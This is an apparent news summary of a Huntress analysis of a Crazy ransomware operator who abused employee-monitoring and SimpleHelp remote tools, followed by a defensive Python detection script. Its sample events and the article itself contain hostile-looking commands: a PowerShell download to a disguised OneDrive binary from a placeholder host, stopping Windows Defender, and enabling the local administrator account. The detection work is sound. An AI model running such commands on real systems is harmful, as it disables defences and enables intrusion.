A member of the Crazy ransomware gang used employee monitoring software and the SimpleHelp remote support tool to maintain persistence and prepare ransomware deployment across multiple corporate breaches, a technical analysis by Huntress reported.
KEY FACTS
- Tools abused: Net Monitor for Employees Professional and SimpleHelp, both used for remote access
- Installation methods: Net Monitor via msiexec; SimpleHelp via PowerShell, with disguised filenames
- Persistence steps: attempts to enable the local administrator account and disable Windows Defender
- Initial access: compromised SSL VPN credentials; only one ransomware deployment observed
Attackers installed Net Monitor for Employees Professional using msiexec.exe, deploying the monitoring agent directly from the developer site. SimpleHelp was downloaded and installed with PowerShell, sometimes using filenames that mimicked Visual Studio or OneDrive binaries.
The monitoring agent allowed remote viewing of desktops, file transfers, and command execution. Operators configured rules to trigger on cryptocurrency-related activity and on remote management tool keywords, with examples including metamask, exodus, binance, etherscan, RDP, anydesk, and teamview.
For redundancy, attackers attempted to enable the local administrator account using the command net user administrator /active:yes. They also tried to stop and remove Windows Defender services, and they kept multiple remote access channels so that access survived if one tool was removed.
Only one incident led to deployment of Crazy ransomware, while another intrusion shared the same vhost.exe filename and overlapping command and control infrastructure, indicating a likely single operator or group. Both breaches began after compromised SSL VPN credentials were used, and organizations were advised to monitor for unauthorized remote monitoring and support tools and to enforce multifactor authentication.
WHY IT MATTERS
Legitimate remote management tools can let attackers blend in with normal activity and maintain long term access. Monitoring installations of such tools and enforcing multifactor authentication on remote access services reduces the risk of similar intrusions.
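As an added defender-side example (not code from the Huntress analysis or from this article), the following Python applies simple process-creation detection rules for the behaviours described above to constructed sample events; the field names, rule patterns, sample paths and placeholder host are assumptions, not observed indicators.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str
    command_line: str


# Each rule: (name, image pattern, command-line pattern); matched case-insensitively.
# Patterns are illustrative assumptions derived from the behaviours in the article.
RULES = [
    ("netmonitor_msi_install", r"\\msiexec\.exe$", r"net\s*monitor"),
    ("powershell_download_disguised_exe", r"\\powershell(_ise)?\.exe$",
     r"(downloadfile|invoke-webrequest|iwr|curl|start-bitstransfer).*"
     r"(onedrive|devenv|visualstudio|vs_|simplehelp)[\w-]*\.exe"),
    ("local_admin_enabled", r"\\net1?\.exe$", r"user\s+administrator\s+/active:\s*yes"),
    ("defender_service_tamper", r"\\(sc|powershell|net1?)\.exe$",
     r"(stop|delete|config)\s+windefend|stop-service.*windefend|set-mppreference.*-disable"),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I | re.S)) for n, i, c in RULES]


def evaluate(event: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if clean)."""
    return [name for name, img, cmd in COMPILED
            if img.search(event.image) and cmd.search(event.command_line)]


def scan(events):
    """Map event index -> matched rule names, skipping events that match nothing."""
    hits = {}
    for idx, ev in enumerate(events):
        names = evaluate(ev)
        if names:
            hits[idx] = names
    return hits


# Constructed sample telemetry (not real incident data); paths and host are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\Public\NetMonitorEmployeesPro.msi" /qn'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c \"Invoke-WebRequest https://placeholder.invalid/a "
              "-OutFile C:\\ProgramData\\OneDriveSetup.exe\""),
    ProcEvent(r"C:\Windows\System32\net1.exe", "net1 user administrator /active:yes"),
    ProcEvent(r"C:\Windows\System32\sc.exe", "sc stop WinDefend"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r'msiexec.exe /i "C:\Temp\7zip.msi" /qn'),
    ProcEvent(r"C:\Windows\System32\net.exe", "net user alice /add"),  # benign, no hit
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(names)}")
```

The last two sample events are benign controls showing that an ordinary MSI install and a routine net user command do not fire any rule.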